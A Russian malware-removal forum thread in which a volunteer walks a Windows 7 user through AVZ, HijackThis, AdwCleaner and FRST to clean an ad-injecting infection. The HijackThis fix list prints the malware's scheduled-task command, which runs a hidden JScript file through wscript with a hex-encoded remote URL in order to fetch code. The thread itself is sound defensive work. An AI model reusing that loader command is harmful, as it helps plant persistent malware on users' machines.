Решена Вирус блокирует все, что можно...

[rainbled]

Здраствуйте. Вирус подцеплен неизвестно откуда и не мной, но перейду сразу к описанию.
Блокирует сайты с антивирусами, многие антивирусы(об этом далее), командную строку, проделывал элементарные манипуляции с просторов интернета, которые во многом не возможны.
Вирус еще проявляет себя переодически открывая, браузер (гугл) с сайтами всяких казино, рулеток, сериалов и т.п.
Удалил по дурости файл хостс из систем32. Появился какой-то: 2017-01-27_11-16_hosts.bak
Через смартфон скачивал доктор вэб одноразовый, он к удивлению запускался, проверял, даже что-то находил и удалял или перемещал в карантин, но ситуация не изменилась.
В старых папках нашел Hijack он запускается тоже, я даже анализировал и фиксил ним, но все безнадежно.
Фак ю читал, скачивал автологер, но он после запуска, запускает АVZ и успешно зависает, то есть вирус блокриует его почти моментально. Зависание снимается через диспетчер задач, снятием задачи, иногда все зависает на темный экран и при нажатии вылазиет стандартное меню с выбором перезагрузки, выйти из системы и т.д., после чего приходиться только перезагружать.
Система виндовс 7 сп1.
С уважением, надеюсь на вашу помощь...

 

[Sandor]

Здравствуйте!

В чате я дал вам рекомендации. Вы пробовали в безопасном режиме?

 

[rainbled]

Здравствуйте!

В чате я дал вам рекомендации. Вы пробовали в безопасном режиме?

Я честно говоря побоялся, что все опять зависнет и я потеряю вашу ссылку, поэтому сразу написал сюда. Сейчас проделаю

 

[Sandor]

Если не получится и в безопасном режиме, пробуйте лечить с помощью Kaspersky Removal Tool
После этого пробуйте опять запустить Автологер.

 

[rainbled]

C безопасным режимом получилось!

 

[Sandor]

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 DeleteSchedulerTask('{15460766-CA16-ED8E-121C-971EF13EC9D6}');
 DeleteSchedulerTask('{473A7281-1AF9-7DA8-1980-5CEC0BFBD50C}');
 DeleteSchedulerTask('VKDJ');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\CMD', 'command', '64');
 ExecuteRepair(3);
 ExecuteRepair(4);
 ExecuteRepair(13);
RebootWindows(false);
end.

Компьютер перезагрузится.





Для повторной диагностики запустите снова AutoLogger. Пробуйте в нормальном режиме (не в безопасном).
Прикрепите к следующему сообщению свежий CollectionLog.

 

[rainbled]

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
DeleteSchedulerTask('{15460766-CA16-ED8E-121C-971EF13EC9D6}');
DeleteSchedulerTask('{473A7281-1AF9-7DA8-1980-5CEC0BFBD50C}');
DeleteSchedulerTask('VKDJ');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\CMD', 'command', '64');
ExecuteRepair(3);
ExecuteRepair(4);
ExecuteRepair(13);
RebootWindows(false);
end.

Компьютер перезагрузится.





Для повторной диагностики запустите снова AutoLogger. Пробуйте в нормальном режиме (не в безопасном).
Прикрепите к следующему сообщению свежий CollectionLog.

А не могли бы вы коротко описать, шаги как выполнить скрипт в АВЗ, а то после прехода к инструкции браузер зависает (видимо что вирус блокирует по названию)

 

[Sandor]

Файл - Выполнить скрипт

Это и есть краткое описание. Появится поле, куда следует вставить скопированный скрипт и нажать кнопку "Выполнить"

 

[rainbled]

Запустилось без безопасного режима.

 

[Sandor]

"Пофиксите" в HijackThis:

O1 - Hosts: Reset contents to default
O4 - MSConfig\startupreg: CMD [command] = (HKLM) (2015/11/15) (no file)
O4 - MSConfig\startupreg: lite [command] = C:\Users\castle\AppData\Local\Lite\Application\lite.exe --no-startup-window (HKCU) (2018/08/21)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (.job): (Not scheduled) Chromium conof.job - C:\Windows\system32\wscript.exe "C:\ProgramData\{98125D71-1250-D7B7-9496-49F50ED4C23B}\lole.txt" "68747470733a2f2f64326234366537617832617466692e636c6f756466726f6e742e6e6574" "//B" "//E:jscript" "--IsErIk"

Далее:

• Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
• Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
• Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt (где x - любая цифра).
• Прикрепите отчет к своему следующему сообщению.

Подробнее читайте в этом руководстве.

 

[rainbled]

Просканировал, почистить и исправить не нажимал.

 

[Sandor]

1.

• Запустите повторно AdwCleaner (by Malwarebytes) (программу необходимо запускать через правую кн. мыши от имени администратора).
• В меню Настройки включите дополнительно в разделе Базовые действия:
  • Сбросить Hosts
  • Сбросить политики IE
  • Сбросить политики Chrome
• В меню Панель управления нажмите Сканировать.
• По окончании нажмите кнопку Очистить и восстановить и дождитесь окончания удаления.
• Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt (где x - любая цифра).
• Прикрепите отчет к своему следующему сообщению

Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

Подробнее читайте в этом руководстве.

2.
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.

 

[rainbled]

Гугл, что то ворчал на фарбар, что его редко скачивают.

 

[Sandor]

что его редко скачивают

Просто он часто обновляется.

• Отключите до перезагрузки антивирус.
• Выделите следующий код:
  

  Start::
  CreateRestorePoint:
  GroupPolicy: Restriction ? <==== ATTENTION
  GroupPolicy\User: Restriction ? <==== ATTENTION
  FF Extension: (Домашняя страница Mail.Ru) - C:\Users\castle\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\Extensions\homepage@mail.ru.xpi [2018-10-26]
  FF Extension: (Поиск Mail.Ru) - C:\Users\castle\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\Extensions\search@mail.ru.xpi [2018-10-26]
  FF Extension: (Pult) - C:\Users\castle\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\Extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}.xpi [2018-10-26]
  CHR StartupUrls: Default -> "hxxp://mail.ru/cnt/10445?gp=812204"
  C:\Users\castle\AppData\Local\Google\Chrome\User Data\Default\Extensions\phkdcinmmljblpnkohlipaiodlonpinf
  C:\Users\castle\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmpoaahleccaibbhfjfimigepmfmmbbk
  S1 webviewerprocontroller; \??\C:\Windows\system32\drivers\webviewprocontroller.sys [X]
  2018-02-22 15:19 - 2018-10-26 16:56 - 000000757 _____ () C:\Users\castle\AppData\Local\uBar.lnk
  Task: {E7BD5108-35FA-4CD5-9B01-30F2BF8F4DE6} - \{5058A108-A702-49F0-DE33-C2D9F1678DE2} -> No File <==== ATTENTION
  Task: {FB9D1EFF-9937-403F-A534-85C75D8BF93B} - \cvc -> No File <==== ATTENTION
  AlternateDataStreams: C:\ProgramData:NT [40]
  AlternateDataStreams: C:\ProgramData:NT2 [432]
  AlternateDataStreams: C:\Users\All Users:NT [40]
  AlternateDataStreams: C:\Users\All Users:NT2 [432]
  AlternateDataStreams: C:\Users\castle:Heroes & Generals [38]
  AlternateDataStreams: C:\Users\Все пользователи:NT [40]
  AlternateDataStreams: C:\Users\Все пользователи:NT2 [432]
  AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
  AlternateDataStreams: C:\ProgramData\Application Data:NT2 [432]
  AlternateDataStreams: C:\Users\castle\Application Data:NT [40]
  AlternateDataStreams: C:\Users\castle\Application Data:NT2 [432]
  AlternateDataStreams: C:\Users\castle\AppData\Roaming:NT [40]
  AlternateDataStreams: C:\Users\castle\AppData\Roaming:NT2 [432]
  AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [462]
  AlternateDataStreams: C:\Users\Все пользователи\Application Data:NT [40]
  AlternateDataStreams: C:\Users\Все пользователи\Application Data:NT2 [432]
  EmptyTemp:
  Reboot:
  End::

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

 

[rainbled]

готово

 

[Sandor]

Что из проблем сейчас осталось?

 

[rainbled]

Что из проблем сейчас осталось?

Сайты антивирусов открывает, командная строка появилась, реклама вроде не появляется. Вроде все чисто, спасибо большое!

 

[Sandor]

Хорошо, в завершение:
1.

• Пожалуйста, запустите adwcleaner.exe
• В меню Настройки - Удалить AdwCleaner - выберите Удалить.
• Подтвердите удаление, нажав кнопку: Да.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.

2.

• Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе
• Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
• Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
• Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
• Прикрепите этот файл к своему следующему сообщению.

 

[rainbled]

Она при запуске выдала что-то про отсутствие подключения к интернету и предложила продолжить с локальной базой, я нажал Да.

 

[Sandor]

------------------------------- [ Windows ] -------------------------------
Internet Explorer 11.0.9600.17843 Внимание! Скачать обновления
^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
Автоматическое обновление отключено
Дата установки обновлений: 2017-04-26 08:25:54
------------------------------- [ HotFix ] --------------------------------
HotFix KB3115858 Внимание! Скачать обновления
HotFix KB3140735 Внимание! Скачать обновления
HotFix KB3138962 Внимание! Скачать обновления
HotFix KB3145739 Внимание! Скачать обновления
HotFix KB3146963 Внимание! Скачать обновления
HotFix KB3156013 Внимание! Скачать обновления
HotFix KB3156016 Внимание! Скачать обновления
HotFix KB3156019 Внимание! Скачать обновления
HotFix KB3153171 Внимание! Скачать обновления
HotFix KB3170455 Внимание! Скачать обновления
HotFix KB3178034 Внимание! Скачать обновления
HotFix KB3185911 Внимание! Скачать обновления
HotFix KB3184122 Внимание! Скачать обновления
HotFix KB3192391 Внимание! Скачать обновления
HotFix KB3197867 Внимание! Скачать обновления
HotFix KB3205394 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4019263 Внимание! Скачать обновления
HotFix KB4022722 Внимание! Скачать обновления
HotFix KB4015546 Внимание! Скачать обновления
HotFix KB4025337 Внимание! Скачать обновления
HotFix KB4034679 Внимание! Скачать обновления
HotFix KB4041678 Внимание! Скачать обновления
HotFix KB4056894 Внимание! Скачать обновления
HotFix KB4056897 Внимание! Скачать обновления
HotFix KB4074587 Внимание! Скачать обновления
HotFix KB4103712 Внимание! Скачать обновления
HotFix KB4343899 Внимание! Скачать обновления
HotFix KB4457145 Внимание! Скачать обновления
--------------------------------- [ P2P ] ---------------------------------
µTorrent v.3.5.4.44632 Внимание! Клиент сети P2P! Может содержать рекламные модули или использоваться для скачивания нежелательного контента.
-------------------------------- [ Java ] ---------------------------------
Java 8 Update 171 v.8.0.1710.11 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u181-windows-i586.exe)^
--------------------------- [ AdobeProduction ] ---------------------------
Adobe Flash Player 30 PPAPI v.30.0.0.113 Внимание! Скачать обновления
---------------------------- [ UnwantedApps ] -----------------------------
Unity Web Player v.5.3.2f1 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
Skype Click to Call v.8.5.0.9167 Внимание! Панель для браузера. Может замедлять работу браузера и иметь проблемы с нарушением конфиденциальности.

По возможности вышеуказанное следует обновить/исправить.

Рекомендации после удаления вредоносного ПО